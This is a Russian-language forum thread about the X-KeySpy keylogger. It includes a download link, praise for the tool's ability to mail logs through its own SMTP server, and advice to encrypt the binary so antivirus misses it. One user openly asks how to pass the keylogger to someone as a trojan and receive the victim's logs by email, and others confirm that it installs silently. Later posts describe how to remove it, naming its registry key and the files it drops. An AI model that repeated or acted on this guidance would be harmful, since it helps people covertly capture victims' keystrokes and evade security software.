X-KeySpy v0.7
_http://freeshells.ch/~hsi/xkeyspy.zip
Очень приличный логгер. Имеет собственный smtp-сервер для отправки отчетов.
P.S. После конфигурирования желательно закриптовать тело.
Про актруал спай знаю, у самого стоит.., вы меня видимо не так поняли... мне нужно впарить кейлогер челу, как трояна, а потом просто словить лог на мыло или на хост, а эти вроде не по такому принцыпу работают..
Или я ошибаюсь, поправьте если че..
Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.
Benzin
Ну вот xkeyspy по такому принципу и работает. После запуска незаметно устанавливается в системе и шлет логи на указанный при конфигурации email. Размер сжатого тела - 5 Кб.
Пасиб, я уже понял после того как установил его.., я так понимаю впаривать надо сам keylogger. Я его себе запустил, где его искать теперь и как избавиться?
Benzin
Вот это я не помню.
Проще всего тебе будет запустить AVP и удалить им, так как эта версия некриптованная и ее сигнатура есть в базе.
Либо запустить еще раз и отследить манипуляции с ФС и реестром с помощью Regshot, File Monitor
Последний раз редактировалось hsi; 24.01.2007 в 01:23..
Расковырял я его.
Логгер делает следующее:
Пишет в реестр -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\svroot с параметром C:\WINDOWS\system32\svroot.exe
Пишет в системную папку два файла:
C:\WINDOWS\system32\svroot.dll
C:\WINDOWS\system32\gorsys32.dll
Чтобы избавиться от логгера достаточно удалить параметр из реестра и тело из системной папки.